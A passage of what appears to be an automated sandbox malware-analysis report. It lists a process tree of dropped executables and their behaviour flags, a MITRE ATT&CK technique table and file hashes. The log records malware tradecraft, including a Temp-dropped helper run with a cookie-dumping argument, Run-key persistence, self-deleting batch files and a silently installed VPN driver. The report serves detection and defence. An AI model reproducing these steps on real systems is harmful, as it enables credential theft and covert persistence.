                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:4300
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:1252
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            5⤵
                                                                                                                                                              PID:476
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                              5⤵
                                                                                                                                                                PID:6948
                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:3932
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                          2⤵
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          PID:4176
                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                        1⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:4852
                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4992
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                          1⤵
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:4528
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                          1⤵
                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          PID:2176
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                          1⤵
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          PID:5968
                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                          1⤵
                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                          PID:5148
                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding B5E983DF1456D7B15267C7700E245DF0 C
                                                                                                                                                            2⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:5828
                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding A532A8E501CD479993DB4EC972CE8DF2
                                                                                                                                                            2⤵
                                                                                                                                                              PID:5996
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                              2⤵
                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              PID:5360
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:5572
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    PID:6512
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1a8,0x1a4,0x1c8,0x1ac,0x1ec,0x7ffc37cd9ec0,0x7ffc37cd9ed0,0x7ffc37cd9ee0
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      PID:5996
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1528,787586120841744603,7122700687534736912,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_1247301749" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1548 /prefetch:2
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:5452
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,787586120841744603,7122700687534736912,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_1247301749" --mojo-platform-channel-handle=1812 /prefetch:8
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4992
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,787586120841744603,7122700687534736912,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_1247301749" --mojo-platform-channel-handle=2144 /prefetch:8
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:5920
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1528,787586120841744603,7122700687534736912,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_1247301749" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2452 /prefetch:1
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            PID:6120
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1528,787586120841744603,7122700687534736912,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_1247301749" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1616 /prefetch:2
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4248
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,787586120841744603,7122700687534736912,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_1247301749" --mojo-platform-channel-handle=2708 /prefetch:8
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:5344
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,787586120841744603,7122700687534736912,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_1247301749" --mojo-platform-channel-handle=3264 /prefetch:8
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:2460
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,787586120841744603,7122700687534736912,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_1247301749" --mojo-platform-channel-handle=3252 /prefetch:8
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:4224
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,787586120841744603,7122700687534736912,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_1247301749" --mojo-platform-channel-handle=2104 /prefetch:8
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:5228
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,787586120841744603,7122700687534736912,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_1247301749" --mojo-platform-channel-handle=2560 /prefetch:8
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:6136
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEBD22.bat" "
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:6068
                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                        C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                        PID:6900
                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:6476
                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                        C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEBD22.bat"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                        PID:6072
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:6236
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEBD22.bat" "
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:6312
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEBF07.bat" "
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:6116
                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                              C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                              PID:1132
                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                              C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:6908
                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                              C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:6596
                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                              C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEBF07.bat"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                              PID:1272
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEBF07.bat" "
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:6424
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:4144
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:5816
                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                            PID:4872
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:5776
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4484
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:6516
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:6584
                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                              PID:5932
                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                              PID:5760
                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{107168ca-867b-044a-8724-ba72cda3884f}\oemvista.inf" "9" "4d14a44ff" "000000000000016C" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                PID:6040
                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000016C"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:5764
                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                              PID:5244
                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:6288
                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                PID:6140
                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                  MaskVPNUpdate.exe /silent
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                  PID:4500
                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:2368
                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                  PID:3208
                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                  PID:4800
                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                  PID:5236
                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                  PID:5532
                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                  PID:6516
                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:3792
                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                    PID:6532
                                                                                                                                                                                                  • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                    C:\Windows\system32\AUDIODG.EXE 0x3c0
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:7084

                                                                                                                                                                                                    Network

                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1060

                                                                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1158

                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                    File Permissions Modification

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1222

                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                    4
                                                                                                                                                                                                    T1112

                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1130

                                                                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1158

                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                    5
                                                                                                                                                                                                    T1081

                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1518

                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                    7
                                                                                                                                                                                                    T1012

                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                    8
                                                                                                                                                                                                    T1082

                                                                                                                                                                                                    Security Software Discovery

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1063

                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                    3
                                                                                                                                                                                                    T1120

                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1018

                                                                                                                                                                                                    Collection

                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                    5
                                                                                                                                                                                                    T1005

                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1102

                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                    • C:\Program Files\unins0000.dat
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      b1fea024dd26bb61f24d14f74e21574c

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      750ecb662506d66fc5a8477ad9f92685f8c9e7ee

                                                                                                                                                                                                      SHA256

